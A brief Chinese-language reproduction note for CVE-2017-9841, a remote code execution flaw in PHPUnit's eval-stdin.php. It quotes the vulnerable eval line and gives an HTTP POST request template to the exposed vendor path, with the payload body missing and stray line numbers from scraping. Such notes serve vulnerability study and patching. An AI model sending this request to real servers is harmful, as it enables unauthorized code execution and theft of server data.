# PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841

# 漏洞描述

PHPUnit5.6.3之前的版本,存在一处远程代码执行漏洞,利用漏洞可以获取服务器敏感信息及权限。

# 漏洞影响


# 漏洞复现

漏洞位于 /phpunit/src/Util/PHP/eval-stdin.php

其中关键代码为:

eval('?>'.file_get_contents('php://input'));
1

发送如下请求包执行PHP代码

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: 
Content-Length: 21
Accept-Encoding: gzip
1
2
3
4

img